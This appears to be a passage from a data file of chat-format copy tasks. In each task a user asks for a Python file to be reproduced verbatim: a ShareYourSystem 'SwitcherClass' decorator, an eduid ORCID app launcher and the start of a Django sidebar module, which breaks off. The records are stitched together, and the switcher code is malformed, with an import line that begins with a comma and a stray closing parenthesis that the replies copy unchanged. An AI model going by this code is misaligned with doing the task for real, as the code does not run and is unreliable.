function\n\t\t\t\tsetattr(\n\t\t\t\t\t\t\tInstanceVariable.__class__,\n\t\t\t\t\t\t\tTriggeredAfterMethodStr,\n\t\t\t\t\t\t\tTriggerer.TriggererClass(**\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t'TriggeringConditionVariable':[\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'SettingKeyVariable',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,self.SwitchedInstanceBoolKeyStr)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.SwitchedInstanceBoolKeyStr,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,True)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t('SettingValueVariable',(operator.eq,False))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t\t\t'TriggeringHookStr':\"After\"\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t)(bindAfter)\n\t\t\t\t\t\t)\n\n\t\t\t\t#Call with a default instance this bind function to be installed\n\t\t\t\tgetattr(InstanceVariable.__class__(),TriggeredAfterMethodStr)()\n\t\t\t\t'''\n\n\t\t\t\t#Say that it is ok\n\t\t\t\tsetattr(InstanceVariable.__class__,self.SwitchedClassBoolKeyStr,True)\n\t\t\t\t\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t#('InstanceVariable is '+SYS._str(InstanceVariable)),\n\t\t\t\t\t\t\t('_LiargVariablesList is '+str(_LiargVariablesList))\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t'''\n\n\t\t\t#Call the SwitchingFunction\n\t\t\tself.SwitchingFunction(*_LiargVariablesList,**_KwargVariablesDict)\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(('self.',self,['SwitchedBoolSuffixStr']))\n\t\t\t'''\n\n\t\t\t#set True for the Bool after the call\n\t\t\tInstanceVariable.__setattr__(self.SwitchedInstanceBoolKeyStr,True)\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(('InstanceVariable.',InstanceVariable,[self.SwitchedBoolSuffixStr]))\n\t\t\t'''\n\n\t\t\t#Return self for the wrapped method call\n\t\t\treturn InstanceVariable\n\n\t\t#set\n\t\tself.SwitchedFunction=SwitchedFunction\n\n\t\t#Return self\n\t\treturn self\n\n#</DefineClass>\n```",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code file line-for-line, unmodified:\n<|memory_start|>```python\n#<ImportSpecificModules>\nimport operator\n,Doer,Representer\nfrom ShareYourSystem.Functers import Functer,Triggerer,Hooker\nBaseModuleStr=\"ShareYourSystem.Functers.Functer\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\")\n#</ImportSpecificModules>\n\n#<DefineLocals>\nSYS.setSubModule(globals())\n\nSwitchingBeforeStr='Before'\nSwitchingAfterStr='After'\nSwitchingBindStr='bind'\n#</DefineLocals>\n\n#<DefineClass>\n@DecorationClass()\nclass SwitcherClass(BaseClass):\n\n\tdef default_init(self,**_KwargVariablesDict):\n\t\t\n\t\t#<DefineSpecificDo>\n\t\tself.SwitchingFunction=None \t\t\t\t#<NotRepresented>\n\t\tself.SwitchedFunction=None\t\t\t\t\t#<NotRepresented>\n\t\tself.SwitchedFunctionStr=\"\" \t\t\t\t#<NotRepresented>\n\t\tself.SwitchedBoolSuffixStr=\"\" \t\t\t\t#<NotRepresented>\n\t\tself.SwitchedClassBoolKeyStr=\"\" \t\t\t#<NotRepresented>\t\n\t\tself.SwitchedInstanceBoolKeyStr=\"\" \t\t#<NotRepresented>\n\t\t#</DefineSpecificDo>\n\n\t\t#Call the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\tdef __call__(self,_Variable):\n\n\t\t#Switch\n\t\tself.switch(_Variable)\n\n\t\t#Link\n\t\tself.FunctedFunction=self.SwitchedFunction\n\n\t\t#Call the call of the parent class\n\t\treturn BaseClass.__call__(self,self.SwitchingFunction)\n\n\tdef switch(self,_Variable=None):\n\n\t\t#set the switching Function\n\t\tif self.SwitchingFunction==None:\n\t\t\tself.SwitchingFunction=_Variable\n\n\t\t#set the SwitchedFunctionStr this is the functing function..and we remove all the tagged Functer@ \n\t\tself.SwitchedFunctionStr=self.SwitchingFunction.__name__.split(Functer.FunctingDecorationStr)[-1]\n\n\t\t#debug\n\t\tself.debug(('self.',self,['SwitchedFunctionStr']))\n\n\t\t#Cut the pre attributing part if there is one\n\t\tif Functer.FunctingAttributeStr in self.SwitchedFunctionStr:\n\t\t\tself.SwitchedFunctionStr=self.SwitchedFunctionStr.split(Functer.FunctingAttributeStr)[-1]\n\t\t#self.SwitchedDoneFunctionStr=Doer.getDoneStrWithDoStr(self.SwitchedFunctionStr)\n\t\t#SwitchedBoolSuffixStr=self.SwitchedDoneFunctionStr[0].upper()+self.SwitchedDoneFunctionStr[1:]\n\n\t\tself.SwitchedBoolSuffixStr=self.SwitchedFunctionStr[0].upper()+self.SwitchedFunctionStr[1:]+'Bool'\n\t\tself.SwitchedInstanceBoolKeyStr='Switching'+self.SwitchedBoolSuffixStr\n\t\t\n\t\t#self.SwitchedInstanceBoolKeyStr='SwitchedInstance'+self.SwitchedBoolSuffixStr\n\t\tself.SwitchedClassBoolKeyStr='SwitchedClass'+self.SwitchedBoolSuffixStr\n\n\t\t#debug\n\t\tself.debug(('self.',self,['SwitchedInstanceBoolKeyStr','SwitchedClassBoolKeyStr']))\n\n\t\t#Definition the SwitchedFunction\n\t\tdef SwitchedFunction(*_LiargVariablesList,**_KwargVariablesDict):\n\n\t\t\t#Alias\n\t\t\tInstanceVariable=_LiargVariablesList[0]\n\n\t\t\t#Append for debbuging\n\t\t\t#if hasattr(InstanceVariable,'DebuggingNotFrameFunctionStrsList'):\n\t\t\t#\tif 'SwitchedFunction' not in InstanceVariable.DebuggingNotFrameFunctionStrsList:\n\t\t\t#\t\tInstanceVariable.DebuggingNotFrameFunctionStrsList.append('SwitchedFunction')\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t('self.',self,['SwitchedClassBoolKeyStr','SwitchedInstanceBoolKeyStr']),\n\t\t\t\t\t\t\tRepresenter.represent(InstanceVariable,**{'RepresentingAlineaIsBool':False})\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t'''\n\n\t\t\t#set the SwitchedBool if it was not already\n\t\t\tif hasattr(InstanceVariable,self.SwitchedInstanceBoolKeyStr)==False:\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug('The InstanceVariable has not the SwitchedBoolSuffixStr..so set it to False')\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tInstanceVariable.__setattr__(self.SwitchedInstanceBoolKeyStr,False)\n\n\t\t\telif getattr(InstanceVariable,self.SwitchedInstanceBoolKeyStr):\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug('The Instance has already done this method')\n\t\t\t\t'''\n\n\t\t\t\t#Return\n\t\t\t\treturn InstanceVariable\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(('self.',self,['SwitchedBoolSuffixStr']))\n\t\t\t'''\n\n\t\t\t#At the level of the class set the new binding set function\n\t\t\tif hasattr(InstanceVariable.__class__,self.SwitchedClassBoolKeyStr)==False:\t\n\n\t\t\t\t#Definition the binding function that will call the init one\n\t\t\t\tdef bindBefore(*_TriggeringVariablesList,**_TriggeringVariablesDict):\n\n\t\t\t\t\t#Alias\n\t\t\t\t\tTriggeredInstanceVariable=_TriggeringVariablesList[0]\n\n\t\t\t\t\t#debug\n\t\t\t\t\t'''\n\t\t\t\t\tself.debug('Reinit with '+Representer.represent(\n\t\t\t\t\t\tTriggeredInstanceVariable.SettingKeyVariable,**{'RepresentingAlineaIsBool':False}\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\t'''\n\n\t\t\t\t\t#Definition the init method to trigger\n\t\t\t\t\tSwitchedInitMethod=Functer.getFunctingFunctionWithFuncFunction(\n\t\t\t\t\t\tTriggeredInstanceVariable.__class__.init\n\t\t\t\t\t)\n\n\t\t\t\t\t#debug\n\t\t\t\t\t'''\n\t\t\t\t\tself.debug(\n\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t'SwitchedInitMethod is '+str(SwitchedInitMethod),\n\t\t\t\t\t\t\t\t\t\"SwitchedInitMethod.func_globals['__file__'] is \"+SwitchedInitMethod.func_globals['__file__']\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t)\n\t\t\t\t\t'''\n\n\t\t\t\t\t#Call the init method (just at the level of this class definition) (so IMPORTANT this is init not __init__)\n\t\t\t\t\tSwitchedInitMethod(TriggeredInstanceVariable)\n\n\t\t\t\t#set the name\n\t\t\t\tTriggeredBeforeMethodStr='bindBeforeWith'+self.SwitchedBoolSuffixStr\n\t\t\t\tbindBefore.__name__=TriggeredBeforeMethodStr\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t(\"self.\",self,['SwitchedDoneFunctionStr','SwitchedBoolSuffixStr']),\n\t\t\t\t\t\t\t\t(\"TriggeredMethodStr is \"+TriggeredMethodStr)\n\t\t\t\t\t\t\t]\n\t\t\t\t\t\t)\n\t\t\t\t'''\n\n\t\t\t\t#Link the bindBefore function\n\t\t\t\tsetattr(\n\t\t\t\t\t\t\tInstanceVariable.__class__,\n\t\t\t\t\t\t\tTriggeredBeforeMethodStr,\n\t\t\t\t\t\t\tTriggerer.TriggererClass(**\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t'TriggeringConditionVariable':[\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'SettingKeyVariable',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,self.SwitchedInstanceBoolKeyStr)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.SwitchedInstanceBoolKeyStr,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,True)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t('SettingValueVariable',(operator.eq,False))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t\t\t'TriggeringHookStr':\"Before\"\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t)(bindBefore)\n\t\t\t\t\t\t)\n\n\t\t\t\t#Call with a default instance this bind function to be installed\n\t\t\t\tgetattr(InstanceVariable.__class__(),TriggeredBeforeMethodStr)()\n\n\t\t\t\t'''\n\t\t\t\t#Definition the binding function that will set the switched bool to True\n\t\t\t\tdef bindAfter(*_TriggeringVariablesList,**_TriggeringVariablesDict):\n\n\t\t\t\t\t#Alias\n\t\t\t\t\tTriggeredInstanceVariable=_TriggeringVariablesList[0]\n\n\t\t\t\t\t#Say that it is ok\n\t\t\t\t\tsetattr(TriggeredInstanceVariable,self.SwitchedInstanceBoolKeyStr,False)\n\t\t\t\t\tsetattr(TriggeredInstanceVariable,self.SwitchedInstanceBoolKeyStr,True)\n\t\t\t\t\t\n\t\t\t\t#set the name\n\t\t\t\tTriggeredAfterMethodStr='bindAfterWith'+self.SwitchedBoolSuffixStr\n\t\t\t\tbindAfter.__name__=TriggeredAfterMethodStr\n\n\t\t\t\t#Link the bindAfter function\n\t\t\t\tsetattr(\n\t\t\t\t\t\t\tInstanceVariable.__class__,\n\t\t\t\t\t\t\tTriggeredAfterMethodStr,\n\t\t\t\t\t\t\tTriggerer.TriggererClass(**\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t'TriggeringConditionVariable':[\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'SettingKeyVariable',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,self.SwitchedInstanceBoolKeyStr)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.SwitchedInstanceBoolKeyStr,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,True)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t('SettingValueVariable',(operator.eq,False))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t\t\t'TriggeringHookStr':\"After\"\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t)(bindAfter)\n\t\t\t\t\t\t)\n\n\t\t\t\t#Call with a default instance this bind function to be installed\n\t\t\t\tgetattr(InstanceVariable.__class__(),TriggeredAfterMethodStr)()\n\t\t\t\t'''\n\n\t\t\t\t#Say that it is ok\n\t\t\t\tsetattr(InstanceVariable.__class__,self.SwitchedClassBoolKeyStr,True)\n\t\t\t\t\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t#('InstanceVariable is '+SYS._str(InstanceVariable)),\n\t\t\t\t\t\t\t('_LiargVariablesList is '+str(_LiargVariablesList))\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t'''\n\n\t\t\t#Call the SwitchingFunction\n\t\t\tself.SwitchingFunction(*_LiargVariablesList,**_KwargVariablesDict)\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(('self.',self,['SwitchedBoolSuffixStr']))\n\t\t\t'''\n\n\t\t\t#set True for the Bool after the call\n\t\t\tInstanceVariable.__setattr__(self.SwitchedInstanceBoolKeyStr,True)\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(('InstanceVariable.',InstanceVariable,[self.SwitchedBoolSuffixStr]))\n\t\t\t'''\n\n\t\t\t#Return self for the wrapped method call\n\t\t\treturn InstanceVariable\n\n\t\t#set\n\t\tself.SwitchedFunction=SwitchedFunction\n\n\t\t#Return self\n\t\treturn self\n\n#</DefineClass>\n```<|memory_end|>",
"role": "user"
}
] |
```python
#<ImportSpecificModules>
import operator
,Doer,Representer
from ShareYourSystem.Functers import Functer,Triggerer,Hooker
BaseModuleStr="ShareYourSystem.Functers.Functer"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Classer")
#</ImportSpecificModules>
#<DefineLocals>
SYS.setSubModule(globals())
SwitchingBeforeStr='Before'
SwitchingAfterStr='After'
SwitchingBindStr='bind'
#</DefineLocals>
#<DefineClass>
@DecorationClass()
class SwitcherClass(BaseClass):
def default_init(self,**_KwargVariablesDict):
#<DefineSpecificDo>
self.SwitchingFunction=None #<NotRepresented>
self.SwitchedFunction=None #<NotRepresented>
self.SwitchedFunctionStr="" #<NotRepresented>
self.SwitchedBoolSuffixStr="" #<NotRepresented>
self.SwitchedClassBoolKeyStr="" #<NotRepresented>
self.SwitchedInstanceBoolKeyStr="" #<NotRepresented>
#</DefineSpecificDo>
#Call the parent init method
BaseClass.__init__(self,**_KwargVariablesDict)
def __call__(self,_Variable):
#Switch
self.switch(_Variable)
#Link
self.FunctedFunction=self.SwitchedFunction
#Call the call of the parent class
return BaseClass.__call__(self,self.SwitchingFunction)
def switch(self,_Variable=None):
#set the switching Function
if self.SwitchingFunction==None:
self.SwitchingFunction=_Variable
#set the SwitchedFunctionStr this is the functing function..and we remove all the tagged Functer@
self.SwitchedFunctionStr=self.SwitchingFunction.__name__.split(Functer.FunctingDecorationStr)[-1]
#debug
self.debug(('self.',self,['SwitchedFunctionStr']))
#Cut the pre attributing part if there is one
if Functer.FunctingAttributeStr in self.SwitchedFunctionStr:
self.SwitchedFunctionStr=self.SwitchedFunctionStr.split(Functer.FunctingAttributeStr)[-1]
#self.SwitchedDoneFunctionStr=Doer.getDoneStrWithDoStr(self.SwitchedFunctionStr)
#SwitchedBoolSuffixStr=self.SwitchedDoneFunctionStr[0].upper()+self.SwitchedDoneFunctionStr[1:]
self.SwitchedBoolSuffixStr=self.SwitchedFunctionStr[0].upper()+self.SwitchedFunctionStr[1:]+'Bool'
self.SwitchedInstanceBoolKeyStr='Switching'+self.SwitchedBoolSuffixStr
#self.SwitchedInstanceBoolKeyStr='SwitchedInstance'+self.SwitchedBoolSuffixStr
self.SwitchedClassBoolKeyStr='SwitchedClass'+self.SwitchedBoolSuffixStr
#debug
self.debug(('self.',self,['SwitchedInstanceBoolKeyStr','SwitchedClassBoolKeyStr']))
#Definition the SwitchedFunction
def SwitchedFunction(*_LiargVariablesList,**_KwargVariablesDict):
#Alias
InstanceVariable=_LiargVariablesList[0]
#Append for debbuging
#if hasattr(InstanceVariable,'DebuggingNotFrameFunctionStrsList'):
# if 'SwitchedFunction' not in InstanceVariable.DebuggingNotFrameFunctionStrsList:
# InstanceVariable.DebuggingNotFrameFunctionStrsList.append('SwitchedFunction')
#debug
'''
self.debug(
[
('self.',self,['SwitchedClassBoolKeyStr','SwitchedInstanceBoolKeyStr']),
Representer.represent(InstanceVariable,**{'RepresentingAlineaIsBool':False})
]
)
'''
#set the SwitchedBool if it was not already
if hasattr(InstanceVariable,self.SwitchedInstanceBoolKeyStr)==False:
#debug
'''
self.debug('The InstanceVariable has not the SwitchedBoolSuffixStr..so set it to False')
'''
#set
InstanceVariable.__setattr__(self.SwitchedInstanceBoolKeyStr,False)
elif getattr(InstanceVariable,self.SwitchedInstanceBoolKeyStr):
#debug
'''
self.debug('The Instance has already done this method')
'''
#Return
return InstanceVariable
#debug
'''
self.debug(('self.',self,['SwitchedBoolSuffixStr']))
'''
#At the level of the class set the new binding set function
if hasattr(InstanceVariable.__class__,self.SwitchedClassBoolKeyStr)==False:
#Definition the binding function that will call the init one
def bindBefore(*_TriggeringVariablesList,**_TriggeringVariablesDict):
#Alias
TriggeredInstanceVariable=_TriggeringVariablesList[0]
#debug
'''
self.debug('Reinit with '+Representer.represent(
TriggeredInstanceVariable.SettingKeyVariable,**{'RepresentingAlineaIsBool':False}
)
)
'''
#Definition the init method to trigger
SwitchedInitMethod=Functer.getFunctingFunctionWithFuncFunction(
TriggeredInstanceVariable.__class__.init
)
#debug
'''
self.debug(
[
'SwitchedInitMethod is '+str(SwitchedInitMethod),
"SwitchedInitMethod.func_globals['__file__'] is "+SwitchedInitMethod.func_globals['__file__']
]
)
'''
#Call the init method (just at the level of this class definition) (so IMPORTANT this is init not __init__)
SwitchedInitMethod(TriggeredInstanceVariable)
#set the name
TriggeredBeforeMethodStr='bindBeforeWith'+self.SwitchedBoolSuffixStr
bindBefore.__name__=TriggeredBeforeMethodStr
#debug
'''
self.debug(
[
("self.",self,['SwitchedDoneFunctionStr','SwitchedBoolSuffixStr']),
("TriggeredMethodStr is "+TriggeredMethodStr)
]
)
'''
#Link the bindBefore function
setattr(
InstanceVariable.__class__,
TriggeredBeforeMethodStr,
Triggerer.TriggererClass(**
{
'TriggeringConditionVariable':[
(
'SettingKeyVariable',
(operator.eq,self.SwitchedInstanceBoolKeyStr)
),
(
self.SwitchedInstanceBoolKeyStr,
(operator.eq,True)
),
('SettingValueVariable',(operator.eq,False))
],
'TriggeringHookStr':"Before"
}
)(bindBefore)
)
#Call with a default instance this bind function to be installed
getattr(InstanceVariable.__class__(),TriggeredBeforeMethodStr)()
'''
#Definition the binding function that will set the switched bool to True
def bindAfter(*_TriggeringVariablesList,**_TriggeringVariablesDict):
#Alias
TriggeredInstanceVariable=_TriggeringVariablesList[0]
#Say that it is ok
setattr(TriggeredInstanceVariable,self.SwitchedInstanceBoolKeyStr,False)
setattr(TriggeredInstanceVariable,self.SwitchedInstanceBoolKeyStr,True)
#set the name
TriggeredAfterMethodStr='bindAfterWith'+self.SwitchedBoolSuffixStr
bindAfter.__name__=TriggeredAfterMethodStr
#Link the bindAfter function
setattr(
InstanceVariable.__class__,
TriggeredAfterMethodStr,
Triggerer.TriggererClass(**
{
'TriggeringConditionVariable':[
(
'SettingKeyVariable',
(operator.eq,self.SwitchedInstanceBoolKeyStr)
),
(
self.SwitchedInstanceBoolKeyStr,
(operator.eq,True)
),
('SettingValueVariable',(operator.eq,False))
],
'TriggeringHookStr':"After"
}
)(bindAfter)
)
#Call with a default instance this bind function to be installed
getattr(InstanceVariable.__class__(),TriggeredAfterMethodStr)()
'''
#Say that it is ok
setattr(InstanceVariable.__class__,self.SwitchedClassBoolKeyStr,True)
#debug
'''
self.debug(
[
#('InstanceVariable is '+SYS._str(InstanceVariable)),
('_LiargVariablesList is '+str(_LiargVariablesList))
]
)
'''
#Call the SwitchingFunction
self.SwitchingFunction(*_LiargVariablesList,**_KwargVariablesDict)
#debug
'''
self.debug(('self.',self,['SwitchedBoolSuffixStr']))
'''
#set True for the Bool after the call
InstanceVariable.__setattr__(self.SwitchedInstanceBoolKeyStr,True)
#debug
'''
self.debug(('InstanceVariable.',InstanceVariable,[self.SwitchedBoolSuffixStr]))
'''
#Return self for the wrapped method call
return InstanceVariable
#set
self.SwitchedFunction=SwitchedFunction
#Return self
return self
#</DefineClass>
```
|
[
{
"content": "Here is a code file:\n```python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2016 NORDUnet A/S\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or\n# without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# 3. Neither the name of the NORDUnet nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\nfrom eduid_webapp.orcid.app import init_orcid_app\n\napp = init_orcid_app()\n\n\nif __name__ == '__main__':\n app.logger.info(f'Starting {app}...')\n app.run()\n```\nReplicate it verbatim.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2016 NORDUnet A/S\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or\n# without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# 3. Neither the name of the NORDUnet nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\nfrom eduid_webapp.orcid.app import init_orcid_app\n\napp = init_orcid_app()\n\n\nif __name__ == '__main__':\n app.logger.info(f'Starting {app}...')\n app.run()\n```<|memory_end|>\nReplicate it verbatim.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NORDUnet A/S
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from eduid_webapp.orcid.app import init_orcid_app
app = init_orcid_app()
if __name__ == '__main__':
app.logger.info(f'Starting {app}...')
app.run()
```
|
[
{
"content": "Repeat the code precisely:\n```python\nimport re\nfrom collections import OrderedDict\nfrom django.urls import reverse, resolve, NoReverseMatch\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\n\nfrom ct.models import Course, CourseUnit, UnitLesson, Response\nfrom ctms.urls import urlpatterns as ctms_urls\nfrom .views import CourseCoursletUnitMixin\n\n# course, courslet, unit\nMODEL_ORDER_TUPLE = (('course_pk', Course),\n ('courselet_pk', CourseUnit),\n ('unit_pk', UnitLesson),\n ('response_pk', Response))\nMODELS_ORDERED_DICT = OrderedDict(MODEL_ORDER_TUPLE)\n\nMODEL_NAMES_MAPPING = {\n Course: 'course',\n CourseUnit: 'courslet',\n UnitLesson: 'unit',\n Response: 'response'\n}\n\nNAME_MODEL_MAPPING = {\n 'Course': Course,\n 'Response': Response,\n 'UnitLesson': UnitLesson,\n 'CourseUnit': CourseUnit\n}\n\nALLOWED_MODEL_FILTERS_MAPPING = {\n Course: [''],\n CourseUnit: ['']\n}\n\n\ndef get_model_filter(model, kwargs):\n \"\"\"\n Add filter params to appropriate model if any\n Arguments:\n model (object): Model object\n kwargs (dict): key, value to be added to the model filtering\n\n \"\"\"\n filter_dict = {}\n for field in ALLOWED_MODEL_FILTERS_MAPPING.get(model, []):\n if kwargs.get(field):\n filter_dict[field] = kwargs.get(field)\n return filter_dict\n\n\nclass SideBarUtils(object):\n '''\n Utils class.\n '''\n def __init__(self, get_response):\n # before using this mixin we have to attach request to mixin's instance\n self.course_mixin = CourseCoursletUnitMixin()\n self.get_response = get_response\n\n def __call__(self, request):\n # Code to be executed for each request before\n # the view (and later middleware) are called.\n\n response = self.get_response(request)\n\n # Code to be executed for each request/response after\n # the view is called.\n\n return response\n\n def _get_model_ids(self, kwargs):\n '''\n :param kwargs:\n :return:\n '''\n model_ids = dict()\n last_pk = None\n _, default_model = list(MODELS_ORDERED_DICT.items())[0]\n for kw, model in list(MODELS_ORDERED_DICT.items()):\n if kw in kwargs:\n last_pk = kw\n model_ids[MODELS_ORDERED_DICT[kw]] = kwargs[kw]\n if 'pk' in kwargs:\n if last_pk is None:\n model_ids[default_model] = kwargs['pk']\n else:\n model_ids[\n list(MODELS_ORDERED_DICT.items())[list(MODELS_ORDERED_DICT.keys()).index(last_pk) + 